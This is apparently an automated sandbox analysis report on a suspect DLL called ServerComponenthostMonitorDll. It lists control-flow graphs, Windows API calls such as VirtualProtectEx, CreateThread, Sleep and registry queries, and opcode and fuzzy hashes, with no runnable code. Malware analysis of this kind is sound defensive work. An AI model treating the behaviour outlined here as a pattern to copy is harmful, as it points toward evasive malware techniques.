                                                                control_flow_graph 310 1aff3ac0-1aff3ae1 call 1aff3d10 313 1aff3ae6-1aff3af0 310->313 314 1aff3bda 313->314 315 1aff3af6-1aff3b02 313->315 318 1aff3bdc-1aff3be0 314->318 316 1aff3b24-1aff3b4e call 1aff8d50 VirtualQuery 315->316 317 1aff3b04-1aff3b10 315->317 322 1aff3b55-1aff3b5d 316->322 323 1aff3b50 316->323 317->316 319 1aff3b12-1aff3b22 317->319 319->313 324 1aff3b5f-1aff3b68 322->324 325 1aff3bbd-1aff3bd0 call 1aff3d10 322->325 323->314 324->325 327 1aff3b6a-1aff3b90 VirtualAlloc 324->327 333 1aff3bd5 325->333 329 1aff3b9b-1aff3ba5 GetLastError 327->329 330 1aff3b92-1aff3b97 327->330 331 1aff3bab-1aff3bbb 329->331 332 1aff3ba7-1aff3ba9 329->332 330->318 331->333 332->318 333->313
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: Virtual$AllocQuery
                                                                • String ID:
                                                                • API String ID: 31662377-0
                                                                • Opcode ID: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
                                                                • Instruction ID: 19f3444bc4a402e61b68216f2b9567748532572c13f4c1a0ab1ea8628616ebe1
                                                                • Opcode Fuzzy Hash: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
                                                                • Instruction Fuzzy Hash: 2A21C73321AB8892DB35DB15E06430AB6A4F388784F500F26EADD47B78DF7DC2818B10

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 334 1aff3458-1aff3467 335 1aff34ef-1aff34f1 334->335 336 1aff346d-1aff3482 GetModuleFileNameW 334->336 337 1aff34f8 335->337 338 1aff34f3 call 1aff37ac 335->338 339 1aff34eb-1aff34ed 336->339 340 1aff3484-1aff3499 PathFindFileNameW call 1aff3930 336->340 341 1aff34fd-1aff3505 337->341 338->337 339->341 340->339 345 1aff349b-1aff34a2 call 1aff3878 340->345 345->339 348 1aff34a4-1aff34ab 345->348 348->337 349 1aff34ad-1aff34e4 CreateThread call 1aff1eb4 348->349 351 1aff34e9 349->351 351->337
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32 ref: 1AFF347A
                                                                • PathFindFileNameW.SHLWAPI ref: 1AFF3489
                                                                  • Part of subcall function 1AFF3930: StrCmpNIW.SHLWAPI ref: 1AFF3948
                                                                  • Part of subcall function 1AFF3878: GetModuleHandleW.KERNEL32 ref: 1AFF3886
                                                                  • Part of subcall function 1AFF3878: GetCurrentProcess.KERNEL32 ref: 1AFF38B4
                                                                  • Part of subcall function 1AFF3878: VirtualProtectEx.KERNEL32 ref: 1AFF38D6
                                                                  • Part of subcall function 1AFF3878: GetCurrentProcess.KERNEL32 ref: 1AFF38F4
                                                                  • Part of subcall function 1AFF3878: VirtualProtectEx.KERNEL32 ref: 1AFF3915
                                                                • CreateThread.KERNEL32 ref: 1AFF34D7
                                                                  • Part of subcall function 1AFF1EB4: GetCurrentThread.KERNEL32 ref: 1AFF1EBF
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                • String ID:
                                                                • API String ID: 1683269324-0
                                                                • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                • Instruction ID: 8076ff3690def34252d1b92eb89665c40e1ffdfa05cd2efeefeaad30ac220e51
                                                                • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                • Instruction Fuzzy Hash: 3D01B573B1474292E732E731F8467973391FB4C384F440A29DA2586574EF3DC0848250

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 352 1affd130-1affd158 GetEnvironmentStringsW 353 1affd15e-1affd165 352->353 354 1affd202 352->354 355 1affd167 353->355 356 1affd183-1affd1b5 call 1affd080 353->356 357 1affd205-1affd208 354->357 358 1affd16b-1affd173 355->358 356->354 364 1affd1b7-1affd1c5 call 1affae0c 356->364 359 1affd20a-1affd20d FreeEnvironmentStringsW 357->359 360 1affd213-1affd230 357->360 358->358 362 1affd175-1affd181 358->362 359->360 362->355 362->356 367 1affd1c7-1affd1eb call 1affd080 364->367 368 1affd1f5 364->368 367->368 373 1affd1ed-1affd1f3 367->373 370 1affd1f8-1affd200 call 1affb8d8 368->370 370->357 373->370
                                                                APIs
                                                                • GetEnvironmentStringsW.KERNEL32 ref: 1AFFD149
                                                                • FreeEnvironmentStringsW.KERNEL32 ref: 1AFFD20D
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: EnvironmentStrings$Free
                                                                • String ID:
                                                                • API String ID: 3328510275-0
                                                                • Opcode ID: 6655d75d81b3f5d3cdd8ffb71a0db4099f6c7b3c7a68dca63c88ca8711a21244
                                                                • Instruction ID: 6df6926c78eed730dcae7a2086944595cddd9cd735a96f43ededa799c59bf4a2
                                                                • Opcode Fuzzy Hash: 6655d75d81b3f5d3cdd8ffb71a0db4099f6c7b3c7a68dca63c88ca8711a21244
                                                                • Instruction Fuzzy Hash: 3821D833B0479485DB209F12A44010AB7A4FB88FD4F494925DFAD63BF8DF38D0568344

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 375 1aff1c28-1aff1c37 call 1aff1650 378 1aff1c3e-1aff1c5b Sleep SleepEx 375->378 379 1aff1d16 378->379 380 1aff1c61-1aff1c64 378->380 381 1aff1d19-1aff1d21 call 1aff18dc 379->381 382 1aff1d0d-1aff1d14 380->382 383 1aff1c6a-1aff1c6d 380->383 381->378 382->381 383->382 385 1aff1c73-1aff1c80 call 1aff15c0 383->385 389 1aff1c82-1aff1c91 call 1aff122c 385->389 390 1aff1d00 385->390 389->390 395 1aff1c93-1aff1ca2 call 1aff15c0 389->395 391 1aff1d02-1aff1d04 390->391 391->379 393 1aff1d06 391->393 393->382 395->390 398 1aff1ca4-1aff1cb3 call 1aff15c0 395->398 398->390 401 1aff1cb5-1aff1cc4 call 1aff15c0 398->401 401->390 404 1aff1cc6-1aff1cd5 call 1aff122c 401->404 404->390 407 1aff1cd7-1aff1ce6 call 1aff122c 404->407 407->390 410 1aff1ce8-1aff1cf7 call 1aff122c 407->410 410->390 413 1aff1cf9-1aff1cfe 410->413 413->391
                                                                APIs
                                                                  • Part of subcall function 1AFF1650: GetProcessHeap.KERNEL32 ref: 1AFF165B
                                                                  • Part of subcall function 1AFF1650: RtlAllocateHeap.NTDLL ref: 1AFF166A
                                                                  • Part of subcall function 1AFF1650: RegOpenKeyExW.ADVAPI32 ref: 1AFF16DA
                                                                  • Part of subcall function 1AFF1650: RegOpenKeyExW.ADVAPI32 ref: 1AFF1707
                                                                  • Part of subcall function 1AFF1650: RegCloseKey.ADVAPI32 ref: 1AFF1721
                                                                  • Part of subcall function 1AFF1650: RegOpenKeyExW.ADVAPI32 ref: 1AFF1741
                                                                  • Part of subcall function 1AFF1650: RegCloseKey.ADVAPI32 ref: 1AFF175C
                                                                  • Part of subcall function 1AFF1650: RegOpenKeyExW.ADVAPI32 ref: 1AFF177C
                                                                  • Part of subcall function 1AFF1650: RegCloseKey.ADVAPI32 ref: 1AFF1797
                                                                  • Part of subcall function 1AFF1650: RegOpenKeyExW.ADVAPI32 ref: 1AFF17B7
                                                                  • Part of subcall function 1AFF1650: RegCloseKey.ADVAPI32 ref: 1AFF17D2
                                                                  • Part of subcall function 1AFF1650: RegOpenKeyExW.ADVAPI32 ref: 1AFF17F2
                                                                • Sleep.KERNEL32 ref: 1AFF1C43
                                                                • SleepEx.KERNELBASE ref: 1AFF1C49
                                                                  • Part of subcall function 1AFF1650: RegCloseKey.ADVAPI32 ref: 1AFF180D
                                                                  • Part of subcall function 1AFF1650: RegOpenKeyExW.ADVAPI32 ref: 1AFF182D
                                                                  • Part of subcall function 1AFF1650: RegCloseKey.ADVAPI32 ref: 1AFF1848
                                                                  • Part of subcall function 1AFF1650: RegOpenKeyExW.ADVAPI32 ref: 1AFF1868
                                                                  • Part of subcall function 1AFF1650: RegCloseKey.ADVAPI32 ref: 1AFF1883
                                                                  • Part of subcall function 1AFF1650: RegOpenKeyExW.ADVAPI32 ref: 1AFF18A3
                                                                  • Part of subcall function 1AFF1650: RegCloseKey.ADVAPI32 ref: 1AFF18BE
                                                                  • Part of subcall function 1AFF1650: RegCloseKey.ADVAPI32 ref: 1AFF18C8
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2258280658.000000001AFF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1AFF0000, based on PE: true
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B00C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 0000000D.00000002.2258280658.000000001B015000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1aff0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: CloseOpen$HeapSleep$AllocateProcess
                                                                • String ID:
                                                                • API String ID: 462584604-0
                                                                • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                • Instruction ID: 7ed86c23eb6553bcc22fdae8a6f633febdb9df005278e100fee2d69884b74959
                                                                • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                • Instruction Fuzzy Hash: A021FA3B302B0591EB049F36EA4032E33B4AB4ABC4F455822CF098777DEF65D4618268

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 445 7ffd9bac0b47-7ffd9bac0b49 446 7ffd9bac0b4b-7ffd9bac0b65 445->446 447 7ffd9bac0b84-7ffd9bace3d8 445->447 446->447 449 7ffd9bace3de-7ffd9bace3e3 447->449
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2268390774.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bac0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: c9$!k9
                                                                • API String ID: 0-3254877420
                                                                • Opcode ID: adcbce3d205e8b98fd7cbec620fc3e9457b48c561759b3c04dbfb8dd5a99dd76
                                                                • Instruction ID: 132597df9a078f763926d6f390a44127c261dffd70019c15ee22e59ace284fef
                                                                • Opcode Fuzzy Hash: adcbce3d205e8b98fd7cbec620fc3e9457b48c561759b3c04dbfb8dd5a99dd76
                                                                • Instruction Fuzzy Hash: BEF0463372E55E4BC706AB7CF8600F8B780EB9313178603F7D044C71A2D511245AC780

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Fy]
                                                                • API String ID: 0-3512072136
                                                                • Opcode ID: c01fc0b171355c867aec9a7de32409eaa6a8dd58fe4139ef478009eb20ae62aa
                                                                • Instruction ID: 8c0328492bb7b7962e9375187d49f292bc33de25bae0eb581a4936dd0b588664
                                                                • Opcode Fuzzy Hash: c01fc0b171355c867aec9a7de32409eaa6a8dd58fe4139ef478009eb20ae62aa
                                                                • Instruction Fuzzy Hash: 59714B63F0F68E4FE7A1DB989C364F97B74EF51314B0A01BAD089C72E3D9156A028790
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Fy]
                                                                • API String ID: 0-3512072136
                                                                • Opcode ID: d22d761d950a03534b18ff893076f79d70f6c886c20c8d2fb5bb970d98ca979f
                                                                • Instruction ID: 1b5ac4377916a19dcfbc756d64295b523627ddfe52d49c60f7eec20d1a3613c2
                                                                • Opcode Fuzzy Hash: d22d761d950a03534b18ff893076f79d70f6c886c20c8d2fb5bb970d98ca979f
                                                                • Instruction Fuzzy Hash: D5715A63F0F68E4FE765EBA89C324F97BB4EF51314B0A01B6D089C72E3D9116A018791
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Fy]
                                                                • API String ID: 0-3512072136
                                                                • Opcode ID: d23b8002b1043e0b42c7fe2dac9f823f2476e7f65567ce6e6e658c345f6d7eec
                                                                • Instruction ID: 4b85b9ddad8f489f756eafd21c31395d73cd9281cd579b4eaeab003586a91541
                                                                • Opcode Fuzzy Hash: d23b8002b1043e0b42c7fe2dac9f823f2476e7f65567ce6e6e658c345f6d7eec
                                                                • Instruction Fuzzy Hash: 1E613A63F0F68E4FE761EBA89C324F97BB4EF51314B0A01B6D089C72E3D9156A018791
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Fy]
                                                                • API String ID: 0-3512072136
                                                                • Opcode ID: 1c7161c57ddee6338d8241c05c5212a0e10506cd41e224cc9125f10851a22c43
                                                                • Instruction ID: d115c67b75e04d1f0c06e19c65121d426020de7bf99d19da94e59cc754fe1a26
                                                                • Opcode Fuzzy Hash: 1c7161c57ddee6338d8241c05c5212a0e10506cd41e224cc9125f10851a22c43
                                                                • Instruction Fuzzy Hash: BB511863F0F68E4FE761DBA88C315B87F74EF51214B0601BAD099D72E3D9116A018791
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2257956900.000000001AFC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 1AFC0000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_1afc0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID: AllocVirtual
                                                                • String ID:
                                                                • API String ID: 4275171209-0
                                                                • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                • Instruction ID: d93c06b081cb921710fc149b15358152c5d7b71d4f26c8282ffb44124da59941
                                                                • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                • Instruction Fuzzy Hash: 8A61E07A70179287CB58EF26D480B2DB391FB44BA4F418526DA1D07749EB38E493C710
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: ffa48fb275cec3172af6e6cfa0432071cd6ef699ba76af2062df9060d62b7cd9
                                                                • Instruction ID: 134ee09a25125d88f507a9f09160e1d36ab9b62cd1dff296da5698ad178d1c3b
                                                                • Opcode Fuzzy Hash: ffa48fb275cec3172af6e6cfa0432071cd6ef699ba76af2062df9060d62b7cd9
                                                                • Instruction Fuzzy Hash: 39513F71E0A64E8FEB59EB98C4605BDB7B5FF54310F1141BED019EB2A6CB396A01CB40
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: d0c9b5c851fa77709714c34d118a6c36e75af40498a766d8541c45a11629a081
                                                                • Instruction ID: 6d8b59b4f15aca8622d31f8be0b8c82e142e665f20b440126c876f9257016c3f
                                                                • Opcode Fuzzy Hash: d0c9b5c851fa77709714c34d118a6c36e75af40498a766d8541c45a11629a081
                                                                • Instruction Fuzzy Hash: BF517F35E0A50E9FDB5ADB98C4685FDBBB1FF55300F1141BAD01AEB2A6CB356A01CB40
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: 41f926c130d5dada1914e01a6d086eb0b82ff416e6c0be2566d22bfef0890228
                                                                • Instruction ID: 02ada28ece0e2518bbcf8564181178dc63ef2828d42c99ef5f91f7aeec11ebb0
                                                                • Opcode Fuzzy Hash: 41f926c130d5dada1914e01a6d086eb0b82ff416e6c0be2566d22bfef0890228
                                                                • Instruction Fuzzy Hash: 82515D71E0964E8FDB58EF98C4A15BCB7B5FF58304F1141BAD01AE7292CB396A09CB50
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 167ebe8026cfbaabe5f10cd3a9ffea9cca11708ac6fc7e786a38b2e3e33fb2af
                                                                • Instruction ID: 2bb09413b1cac95c3409220d4185f1f61faff3be57b34fd4d3777efdc0dc5770
                                                                • Opcode Fuzzy Hash: 167ebe8026cfbaabe5f10cd3a9ffea9cca11708ac6fc7e786a38b2e3e33fb2af
                                                                • Instruction Fuzzy Hash: 0A32A730B19A1D8FDBA9EB48C866AB873E5FF54311B1141B9D01EC72A2DE35AD45CB80
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e66b831a1f4f97545c154317e8bd9ce0c361e9965d04d17fd9f656b0dab8c492
                                                                • Instruction ID: 5c9c685e65fffa59b6fd128c0120e996c6e8f0c9d76bbd8566415bff4935180d
                                                                • Opcode Fuzzy Hash: e66b831a1f4f97545c154317e8bd9ce0c361e9965d04d17fd9f656b0dab8c492
                                                                • Instruction Fuzzy Hash: 5421CF12F1F68F8BF67DB6E8183507C5B487F55360F5B01BAD49D8A1E2DC4E2A416382
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 99a6d1cbcdb0bd08aec44c74d4789de82bb7b56c47d898acafb49a83b92ec2ff
                                                                • Instruction ID: 84e4f40ac68afcbf3241daff36dfa979997be7985047e1d402f3ad7b3118fb7d
                                                                • Opcode Fuzzy Hash: 99a6d1cbcdb0bd08aec44c74d4789de82bb7b56c47d898acafb49a83b92ec2ff
                                                                • Instruction Fuzzy Hash: 8802F434A1EA4E8FD778EFA8D4A15B977E5FF44300F11857EC04EC36A2DA2AB9418741
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fc510e60b2fad32da3574f5527c4bb7a614000eb9ef8290367c7f8cd185c33a2
                                                                • Instruction ID: 17693baf3176f536d6dbbe45ef6bd8e034eecd444e4aa9b5c89df086eb423a94
                                                                • Opcode Fuzzy Hash: fc510e60b2fad32da3574f5527c4bb7a614000eb9ef8290367c7f8cd185c33a2
                                                                • Instruction Fuzzy Hash: A1020530A1964D8FEB68DF58C4E46B477A1FF45300F5152BDC84ECB29ADA39E981CB41
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0fd7d756cb04e7a6402fc579001d52bc7ca5f91637a7d5ea40b4408a8840b5f2
                                                                • Instruction ID: b73a4d51bbd9470700b78884daab784bda24e9803530ab87b29cbe4052632a4d
                                                                • Opcode Fuzzy Hash: 0fd7d756cb04e7a6402fc579001d52bc7ca5f91637a7d5ea40b4408a8840b5f2
                                                                • Instruction Fuzzy Hash: 61F104306196498FEB68DF58C4E16B437E1FF55311F5442BDC84ACB29ACA39F982CB80
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fc44f588530ba65a7050eec96b2d3edf7fa347bf4a28fc6e1ff5966241271fe8
                                                                • Instruction ID: 7e80b559ca3455786a4c9712b6a28c73bbee3e037b7ab6a5d5483c2646576832
                                                                • Opcode Fuzzy Hash: fc44f588530ba65a7050eec96b2d3edf7fa347bf4a28fc6e1ff5966241271fe8
                                                                • Instruction Fuzzy Hash: C3D10331B0E94D4FE778FA5C98666B837C4FF88310B1502B9D45EC72A2DE19AD0687C1
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3d81f33eebad9e65465cff3245f0565afa47c5e2062f3947868d41d53eaee921
                                                                • Instruction ID: 057542781f6875cde3ca9382958a03ca6f0ae3010d57f5af878556583b507c40
                                                                • Opcode Fuzzy Hash: 3d81f33eebad9e65465cff3245f0565afa47c5e2062f3947868d41d53eaee921
                                                                • Instruction Fuzzy Hash: B9D14931B0E58E4FE778FA6888665B83BD5FF54310B1502B9D05EC71B2DE29AD06C782
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 776c9a87f5580fff126c4c8987e6bd6c10cff5d2e0d0afe17cc932c047a28ac1
                                                                • Instruction ID: 5bcc9110f3dc010edb41b4a2e0f7951bd1441f5f8148bffd5bbc4caabf13e682
                                                                • Opcode Fuzzy Hash: 776c9a87f5580fff126c4c8987e6bd6c10cff5d2e0d0afe17cc932c047a28ac1
                                                                • Instruction Fuzzy Hash: 4DD14931B0E58D4FE7B8FE58C4665B937C5FF64310B1502B9D45EC72B2DE2AAA068381
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 31dcd7c349f99bc53ada06ce0ebb320b49704f8ef16caa54762544d06dcc006e
                                                                • Instruction ID: 43d9cc616f23f8bc42055c18fef5162df41b8e07a17b93ec1521805611a72652
                                                                • Opcode Fuzzy Hash: 31dcd7c349f99bc53ada06ce0ebb320b49704f8ef16caa54762544d06dcc006e
                                                                • Instruction Fuzzy Hash: B0D12430A0EB4A8FD378EB58D4A157677E4FFA4304B11457EC48EC76A2DE2AB942C741
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6339759842e7eb2849810b26762e75a6d44d3d8ff01e8a4a8c71a43f0d704735
                                                                • Instruction ID: 1835abfceba485f485e9367f059078287f297377775bab541aedf7fdeeba7c2e
                                                                • Opcode Fuzzy Hash: 6339759842e7eb2849810b26762e75a6d44d3d8ff01e8a4a8c71a43f0d704735
                                                                • Instruction Fuzzy Hash: B0C1173061960A8BEB2CDF48C0E15B537E5FF55311B5546BDC84B8B69BCA38F942CB80
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.2276779366.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_13_2_7ffd9bec0000_ServerComponenthostMonitorDll.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 98ac3bf79acbfb2546e388dfae30417412fb506bc5e23706d659b6b2b76c88d3
                                                                • Instruction ID: 2a87e93cfda5bcd833dd50cee134b3b5f0e7d5bc04af16efde7f7f545095c614
